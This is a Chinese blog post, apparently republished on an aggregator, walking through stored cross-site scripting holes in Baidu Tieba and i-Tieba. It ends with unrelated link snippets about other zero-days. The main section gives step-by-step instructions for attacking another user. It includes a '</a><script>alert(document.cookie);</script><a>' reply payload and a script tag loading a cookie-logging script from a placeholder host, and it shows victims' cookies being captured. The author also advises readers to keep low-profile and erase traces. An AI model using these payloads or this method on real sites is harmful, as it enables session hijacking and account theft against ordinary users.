百度i贴吧0day跨站漏洞

author author     2022-08-09     654

关键词:

经常逛百度贴吧的读者们可能知道,百度在去年 12月31号晚和1月 1号晚一共爆出了3大0day跨站漏洞,都是高危级别的,2个 bug是和小游戏有关的,剩下一个是与贴吧中显示的会员徽章有关。

在说本文的 0day前,我们先来看看之前的3个 bug是怎么被发现和利用的。

首先是前 2个bug,在去年 12月 31号下午的时候,小游戏提交分数的算法首先被我的一个朋友反编译出来,并翻译成 vbs脚本语言,随之而来的是Chrome浏览器插件,可以直接写你想要的分数。

接着,我看到了有-1分,本着好奇心,笔者尝试使用公开的vbs脚本提交了一串英文,想不到居然成功提交了,并且出现在 i贴吧上:

技术分享

理应显示数值的地方居然可以显示英文,我对百度的工作人员制作数据库的能力表示极大的怀疑。紧接着,是笔者的另外一个朋友,看到我的显摆后立刻尝试输入 <script>标签,没错,脚本被执行了!可惜这个漏洞暴露的太快,很快就被百度的工作人员修复了,不能提交非数字字符了。就在其以为没有问题后,其实为小游戏显摆的第 2个bug的爆发给足了充分的准备时间。

在同一个地方,除了分数显示上有问题外,在前面的贴吧名称的显示上也存在着问题。

可能是由于这个小游戏能在小游戏吧和黄金矿工吧上玩,所以百度显摆游戏成绩的时候还要提交贴吧的名称,这时,我们试着提交了“</a><script>alert(“xxx”); </script><a href=”xxx”>黄金矿工”这样的贴吧名称,没错,有弹框跳出来,立刻删掉,去做充分的准备了。

接下来的事大家都知道了,就是在 1月1号晚上爆发了922ee病毒,因为都是最高分,我们从黄金矿工的排名上可以看出,每秒有 400多人的感染速度,这个是相当可怕的(922ee脚本病毒的代码见附件)。

同一天晚上暴露的另外一个跨站漏洞就是会员徽章的 bug,由于准备不够充分,被另外一个人泄露出去了,所以没有怎么利用,不过那次可谓是“全民”使用漏洞!由于会员徽章是在头像附近的,所以几乎所有看到使用方法的都去尝试使用这个漏洞,那时间百度贴吧弹框不断啊!

更有趣的是百度在1月 6号的更新了一次贴吧版本,居然把以前已经修复的会员徽章bug的又爆出来了,不过这次很速度的在1小时左右就修复了,看来曾经的补丁只是临时的,更新后没有把修正的补丁也弄上去。

之前的3大漏洞就介绍到这里,另外值得一提的是,其实投票系统在 4号之前也有个0day的漏洞,在投票选项中写入HTML代码居然没有过滤,直接被写入了网页代码,如图

技术分享

可惜不知为什么不能直接执行 script代码,但是我们兴许可能使用Cross Iframe Trick的方法来突破 iframe的限制。(现在百度在贴吧中已经修复,不过在笔者投稿的时间的时候,i贴吧的投票系统的bug依然存在)现在我们就来说说这次的漏洞吧,不过我事先要先申明,请不要利用该漏洞做违反法律法规的事哦~这个漏洞只供大家技术上研究。研究的时候请尽量保持低调,最好在有吧主权限的贴吧使用,这样研究完后可以方便的清除痕迹。

首先我们要准备 2个账号,一个为受影响的账号(1号),一个为攻击账号(2号)。

这里笔者推荐大家使用 Chrome浏览器,它可以方便的调试网页代码。

先来说说原理吧,这次的 0day漏洞一样出在i贴吧上,看来百度没有做好测试工作就迫不及待放出了 i贴吧。

由于百度 i贴吧的机制类似与微博,会显示关注的发言回复等等数据和自己收到的回复。

问题就出现在显示自己收到的回复上,i贴吧不像贴吧上回复发帖显示的过滤都做得很严密,它会把部分回复显示在 i贴吧中,这时,如果是使用HTML代码回复的,在贴吧中看不出什么,代码也不会被执行,但是在 i贴吧中就不一样了,它对一部分文本不做任何的处理就直接 write到网页上了,这就出现跨站漏洞了!我们接下的的事就是去仔细研究它了。

首先,我们使用 1号账号先发个帖,这是为了方便攻击做的准备(我们可以使用2个浏览器,这样会方便很多)。然后用 2号先随便回复一点东西(这是测试,可以不回直接到第二步),看,1号账号的用户栏下出现了一个新回复的提示:

技术分享

我相信经常使用百度贴吧的用户是不会对这个提示视而不见的。

第二步,我们用精心设计好的脚本代码回复 1号,为了方便起见,我们就用如下代码测试吧:

<script>alert(document.cookie);</script>

由于百度 i贴吧显示的时候会在其上加上超链接,所以我们最好用</a>来关闭超链接:

</a><script>alert(document.cookie);</script><a>

回帖,要保证最后回复的内容是这个代码才有效的,因为 i贴吧中只显示最后回复。

这时,我们的 2号账号的操作已经算完成了,等着1号账号查看回复就好了!点进 1号账号的i贴吧中的回复我的:

技术分享

看,出现了对话框了,而注意网页正好加载到回复的引号后面,正是显示我们的代码的地方。再看网页源代码:

技术分享

确实我们回帖的内容被写入了网页。

现在,我们就尝试的加载脚本文件,相信下面的代码读者们都已经很熟悉了吧:

<scriptsrc=”http://xxx”></script>

将其中的 http://xxx换成我们的脚本文件地址就好了,这里笔者测试使用的是记录Cookies的脚本文件。

由于是回帖我们还是加上</a>和<a>来回帖吧!

回帖后帖子内部虽然是被编码过的,但是不用担心,1号账号还查看回复呢!

技术分享

转到 1号账号中i贴吧的的回复我的页面,果然,回复那里引号中是网页上显示的内容是空的,使用 Chrome的话直接在引号处点击右键,选审查元素,就可以直接转到鼠标右击位置的源代码:

技术分享

看到了吧,代码被插入了!

再看看我们的服务器上的文件:

技术分享

Cookie被记录到了,说明我们的代码被正确执行了!

说到这里我相信读者们已经明白是怎么一回事了吧。另外,由于百度的防御体系问题,发出去带不明链接的帖子、回复可能会被删除,但是 i贴吧中还是会显示最后回复,不管有没有被删,这种机制反而能起到隐藏攻击的作用,这就叫聪明反被聪明误吗?

最近百度暴露出的漏洞都是些高危漏洞,作为一个网站开发人员,特别是这种互交性很强的网站,这些问题都是值得我们借鉴的,我们要尽可能不在网站的任何一处出现高危漏洞,以防止被攻击者利用,来挂马,成为传播病毒的摇篮。

我的百度i贴吧打不开有问题啊求解啊纠结

首选在百度主页上如果没登账号的话点击贴吧能打开,但是登陆我的百度账号就显示目前无法访问,关闭当前页面。其次,当我发的帖子有新回复之后,点击新回复,显示,目前无法访问,关闭当前页面。再次,当我在贴吧里关... 查看详情

百度跳转漏洞

...知道这算不算漏洞,我觉得是有一定的危险的。偶然间在百度贴吧发现一个帖子是这样的:点击之后会跳转到http://zmb338.com,奇怪的是这个回复并没有被贴吧系统删除掉。我试了一下,下面这两个帖子都没有被百度删除掉。 ... 查看详情

什么是0day漏洞?如何预防0day攻击?

什么是0day漏洞?0day漏洞,是指已经被发现,但是还未被公开,同时官方还没有相关补丁的漏洞;通俗的讲,就是除了黑客,没人知道他的存在,其往往具有很大的突发性、破坏性、致命性。0day漏... 查看详情

深入剖析最新ie0day漏洞

在2018年4月下旬,我们使用沙箱发现了IE0day漏洞;自从在野外发现上一个样本(CVE-2016-0189)已经有两年多了。从许多方面来看,这个特别的漏洞及其后续的开发比较有趣。下一篇文章将分析最新的漏洞背后的核心原因,CVE-2018-8174。... 查看详情

0day漏洞

0Day的概念最早用于软件和游戏破解,属于非盈利性和非商业化的组织行为,其基本内涵是“即时性”。Warez被许多人误认为是一个最大的软件破解组织,而实际上,Warez如黑客一样,只是一种行为。0Day也是。当时的0Day是指在正... 查看详情

nginx版本小于等于1.21.5存在0day漏洞,这个漏洞会影响tengine吗?

nginx版本小于等于1.21.5存在0day漏洞,这个漏洞会影响tengine吗?如果程序核心用的tengine,还用升级版本来解决漏洞问题吗?参考技术A会影响的,具体可以去看版本发布说明希望可以帮助你,请采纳,谢谢 查看详情

利用windows0day漏洞部署devilstongue恶意软件

...以色列情报公司Candiru利用微软7月补丁日中修复的2个0day漏洞,部署名为DevilsTongue的新恶意软件。0x00事件概述近日,微软和CitizenLab发现Candiru(微软称为Sourgum)利用微软7月补丁日中修复的2个0day漏洞(CVE-2021-319... 查看详情

[漏洞复现]cve-2018-4878flash0day

1、漏洞概述2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明AdobeFlash28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执... 查看详情

跨站脚本漏洞

跨站脚本漏洞,首先看一下专业说明:跨站脚本漏洞可以再分成两类:Storedattack和Reflectedattack。这两种攻击的主要区别在于有效负荷到达服务器的方式。Storedattack仅以某种形式存储在目标服务器上(例如在数据库中),或通过提... 查看详情

浅谈csrf漏洞

前言:看完小迪老师的CSRF漏洞讲解。感觉不行就自己百度学习。这是总结出来的。 歌曲: 正文:CSRF与xss和像,但是两个是完全不一样的东西。xss攻击(跨站脚本攻击)储存型的XSS由攻击者和受害者一同完成。xss详细介... 查看详情

简单的爬去百度贴吧小爬虫讲解

#-*-coding:utf-8-*-importurllib2,stringdefbaidu_tieba(url,begin_page,end_page):  foriinrange(begin_page,end_page+1):    sName=string.zfill(i,5)+'.html'#返回一个六位数字的html文件,如 查看详情

百度贴吧发帖软件如何发布?

百度贴吧发帖软件如何发布?#百度贴吧发帖#贴吧发帖软件#贴吧软件百度贴吧发帖软件如何发布? 查看详情

最新系统漏洞--esriarcgisserver跨站脚本漏洞

...务的企业级软件平台。EsriArcgisServer10.8.1及之前版本存在跨站脚本漏洞。远程攻击者可利用该漏洞通过诱导用户点击恶意链接执行任意JavaScript代码。 查看详情

windows远程命令执行0day漏洞安全预警

...发件人的图片 一、概要ShadowBrokers泄露多个Windows远程漏洞利用工具,可以利用SMB、RDP服务成功入侵服务器,可以覆盖全球 70%的Windows服务器,且POC已公开,任何人都可以直接下载并远程攻击利用。二、漏洞级别 查看详情

go语言之进阶篇爬百度贴吧并发版

1、爬百度贴吧并发版示例:packagemainimport( "fmt" "net/http" "os" "strconv")//爬取网页内容funcHttpGet(urlstring)(resultstring,errerror) resp,err1:=http.Get(url) iferr1!=nil err=err1 return deferresp.Body.Close() //读取网页body内容 buf:=make([]byte,1024*4) for n,_:=resp.Bo... 查看详情

利用该0day漏洞的攻击活动情况

谷歌研究人员发现macOS漏洞利用。谷歌研究人员在macOS系统中发现了一个安全漏洞——CVE-2021-30869。攻击者利用该漏洞可以以kernel权限执行任意代码。8月底,谷歌研究人员发现了该漏洞的0day在野利用,本文详细介绍利用该... 查看详情

修复xss跨站漏洞

XSS跨站漏洞最终形成的原因是对输入与输出没有严格过滤。1、输入与输出在HTML中,<,>,",‘,&都有比较特殊的意义。HTML标签,属性就是由这几个符合组成的。PHP中提供了htmlspecialchars()、htmlentities()函数可以把一些预定的字... 查看详情

最新系统漏洞--fortinetfortigate跨站脚本漏洞

最新系统漏洞2021年10月22日受影响系统:FortinetFortiGate<=6.4.1FortinetFortiGate6.2.2<=Version<=6.2.5描述:CVE(CAN)ID:CVE-2020-15937FortinetFortiGate是美国飞塔(Fortinet)公司的一套网 查看详情